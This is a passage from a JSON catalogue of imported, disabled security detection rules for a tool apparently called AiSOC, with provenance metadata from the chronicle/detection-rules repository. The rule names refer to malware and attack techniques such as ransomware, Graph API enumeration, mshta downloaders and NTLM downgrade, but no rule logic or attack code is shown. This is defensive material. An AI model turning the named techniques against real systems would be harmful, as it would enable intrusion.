"chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/monero-mining-detector.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "monero_mining_detector", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/monero_mining_detector.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-application-endpoint-requests", "type": "detection", "name": "ms_graph_application_endpoint_requests", "description": "ms_graph_application_endpoint_requests", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-application-endpoint-requests.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_application_endpoint_requests", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_application_endpoint_requests.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-authorization-policy", "type": "detection", "name": "ms_graph_authorization_policy", "description": "ms_graph_authorization_policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-authorization-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_authorization_policy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_authorization_policy.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-delete-method", "type": "detection", "name": "ms_graph_delete_method", "description": "ms_graph_delete_method", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-delete-method.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_delete_method", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_delete_method.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-enumerate-applications", "type": "detection", "name": "ms_graph_enumerate_applications", "description": "ms_graph_enumerate_applications", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-enumerate-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_enumerate_applications", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_enumerate_applications.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-estimate-access", "type": "detection", "name": "ms_graph_estimate_access", "description": "ms_graph_estimate_access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-estimate-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_estimate_access", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_estimate_access.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-failed-file-downloads-multiple-attempts", "type": "detection", "name": "ms_graph_failed_file_downloads_multiple_attempts", "description": "ms_graph_failed_file_downloads_multiple_attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-failed-file-downloads-multiple-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_failed_file_downloads_multiple_attempts", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_failed_file_downloads_multiple_attempts.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-failed-file-downloads-uniq-docs", "type": "detection", "name": "ms_graph_failed_file_downloads_uniq_docs", "description": "ms_graph_failed_file_downloads_uniq_docs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-failed-file-downloads-uniq-docs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_failed_file_downloads_uniq_docs", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_failed_file_downloads_uniq_docs.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-graphrunner-graphrecon-enumeration", "type": "detection", "name": "ms_graph_graphrunner_graphrecon_enumeration", "description": "ms_graph_graphrunner_graphrecon_enumeration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-graphrunner-graphrecon-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_graphrunner_graphrecon_enumeration", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_graphrunner_graphrecon_enumeration.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-group-bad-request", "type": "detection", "name": "ms_graph_group_bad_request", "description": "ms_graph_group_bad_request", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-group-bad-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_group_bad_request", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_group_bad_request.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-group-creation-success", "type": "detection", "name": "ms_graph_group_creation_success", "description": "ms_graph_group_creation_success", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-group-creation-success.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_group_creation_success", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_group_creation_success.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-groups-endpoint-requests", "type": "detection", "name": "ms_graph_groups_endpoint_requests", "description": "ms_graph_groups_endpoint_requests", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-groups-endpoint-requests.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_groups_endpoint_requests", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_groups_endpoint_requests.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-search-query", "type": "detection", "name": "ms_graph_search_query", "description": "ms_graph_search_query", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-search-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_search_query", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_search_query.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-security-open-inbox-enumeration", "type": "detection", "name": "ms_graph_security_open_inbox_enumeration", "description": "ms_graph_security_open_inbox_enumeration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-security-open-inbox-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_security_open_inbox_enumeration", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_security_open_inbox_enumeration.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-updatable-groups-enumeration", "type": "detection", "name": "ms_graph_updatable_groups_enumeration", "description": "ms_graph_updatable_groups_enumeration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-updatable-groups-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_updatable_groups_enumeration", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_updatable_groups_enumeration.yaral" } }, { "id": "chronicle-detection-rules-ms-graph-user-endpoint-requests", "type": "detection", "name": "ms_graph_user_endpoint_requests", "description": "ms_graph_user_endpoint_requests", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-graph-user-endpoint-requests.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_graph_user_endpoint_requests", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/ms_graph_user_endpoint_requests.yaral" } }, { "id": "chronicle-detection-rules-ms-office-product-spawning-exe-in-user-dir", "type": "detection", "name": "ms_office_product_spawning_exe_in_user_dir", "description": "ms_office_product_spawning_exe_in_user_dir", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ms-office-product-spawning-exe-in-user-dir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ms_office_product_spawning_exe_in_user_dir", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/ms_office_product_spawning_exe_in_user_dir.yaral" } }, { "id": "chronicle-detection-rules-mshta-downloads-malware-by-using-covid19-themed-document", "type": "detection", "name": "mshta_downloads_malware_by_using_covid19_themed_document", "description": "mshta_downloads_malware_by_using_covid19_themed_document", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mshta-downloads-malware-by-using-covid19-themed-document.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mshta_downloads_malware_by_using_covid19_themed_document", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/mshta_downloads_malware_by_using_covid_19_themed_document.yaral" } }, { "id": "chronicle-detection-rules-mshta-spwaned-by-svchost-as-seen-in-lethalhta-sysmon", "type": "detection", "name": "mshta_spwaned_by_svchost_as_seen_in_lethalhta_sysmon", "description": "mshta_spwaned_by_svchost_as_seen_in_lethalhta_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mshta-spwaned-by-svchost-as-seen-in-lethalhta-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mshta_spwaned_by_svchost_as_seen_in_lethalhta_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/mshta_spwaned_by_svchost_as_seen_in_lethalhta__sysmon.yaral" } }, { "id": "chronicle-detection-rules-msiexec-web-install", "type": "detection", "name": "msiexec_web_install", "description": "msiexec_web_install", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/msiexec-web-install.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "msiexec_web_install", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/msiexec_web_install.yaral" } }, { "id": "chronicle-detection-rules-mssql-server-backdoor-detection-vollgar", "type": "detection", "name": "mssql_server_backdoor_detection_vollgar", "description": "mssql_server_backdoor_detection_vollgar", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mssql-server-backdoor-detection-vollgar.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mssql_server_backdoor_detection_vollgar", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/ms_sql_server_backdoor_detection__vollgar.yaral" } }, { "id": "chronicle-detection-rules-muddywater-apt-proxy", "type": "detection", "name": "muddywater_apt_proxy", "description": "muddywater_apt_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/muddywater-apt-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "muddywater_apt_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/muddywater_apt__proxy.yaral" } }, { "id": "chronicle-detection-rules-mustang-panda-dropper", "type": "detection", "name": "mustang_panda_dropper", "description": "mustang_panda_dropper", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mustang-panda-dropper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mustang_panda_dropper", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/mustang_panda_dropper.yaral" } }, { "id": "chronicle-detection-rules-mustangpanda-covid19-campaing", "type": "detection", "name": "mustangpanda_covid19_campaing", "description": "mustangpanda_covid19_campaing", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mustangpanda-covid19-campaing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mustangpanda_covid19_campaing", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/mustangpanda_covid_19_campaing.yaral" } }, { "id": "chronicle-detection-rules-mydoom-email-worm-detector-sysmon-behavior", "type": "detection", "name": "mydoom_email_worm_detector_sysmon_behavior", "description": "mydoom_email_worm_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mydoom-email-worm-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mydoom_email_worm_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/mydoom_email_worm_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-nanocore-rat-loaded-by-covid19-update-xlsm-file", "type": "detection", "name": "nanocore_rat_loaded_by_covid19_update_xlsm_file", "description": "nanocore_rat_loaded_by_covid19_update_xlsm_file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/nanocore-rat-loaded-by-covid19-update-xlsm-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "nanocore_rat_loaded_by_covid19_update_xlsm_file", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/nanocore_rat_loaded_by_covid_19_update_xlsm_file.yaral" } }, { "id": "chronicle-detection-rules-nemty-ransomware-lolbins-abuse", "type": "detection", "name": "nemty_ransomware_lolbins_abuse", "description": "nemty_ransomware_lolbins_abuse", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/nemty-ransomware-lolbins-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "nemty_ransomware_lolbins_abuse", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/nemty_ransomware__lolbins_abuse.yaral" } }, { "id": "chronicle-detection-rules-nemty-successor-nefilimnephilim-ransomware", "type": "detection", "name": "nemty_successor_nefilimnephilim_ransomware", "description": "nemty_successor_nefilimnephilim_ransomware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/nemty-successor-nefilimnephilim-ransomware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "nemty_successor_nefilimnephilim_ransomware", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/nemty_successor__nefilim_nephilim_ransomware.yaral" } }, { "id": "chronicle-detection-rules-net-ipc-share-sysmon", "type": "detection", "name": "net_ipc_share_sysmon", "description": "net_ipc_share_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/net-ipc-share-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "net_ipc_share_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/net_ipc_share__sysmon.yaral" } }, { "id": "chronicle-detection-rules-netexe-execution", "type": "detection", "name": "netexe_execution", "description": "netexe_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/netexe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "netexe_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/net_exe_execution.yaral" } }, { "id": "chronicle-detection-rules-netntlm-downgrade-attack", "type": "detection", "name": "netntlm_downgrade_attack", "description": "netntlm_downgrade_attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/netntlm-downgrade-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "netntlm_downgrade_attack", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/netntlm_downgrade_attack_part_1.yaral" } }, { "id": "chronicle-detection-rules-netntlm-downgrade-attack-part-1", "type": "detection", "name": "netntlm_downgrade_attack_part_1", "description": "netntlm_downgrade_attack_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/netntlm-downgrade-attack-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "netntlm_downgrade_attack_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/netntlm_downgrade_attack_part_2.yaral" } }, { "id": "chronicle-detection-rules-netsh-rdp-port-forwarding", "type": "detection", "name": "netsh_rdp_port_forwarding", "description": "netsh_rdp_port_forwarding", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/netsh-rdp-port-forwarding.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "netsh_rdp_port_forwarding", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/microsoft_sysmon/netsh_rdp_port_forwarding.yaral" } }, { "id": "chronicle-detection-rules-netwalker-ransomware-detection", "type": "detection", "name": "netwalker_ransomware_detection", "description": "netwalker_ransomware_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/netwalker-ransomware-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "netwalker_ransomware_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 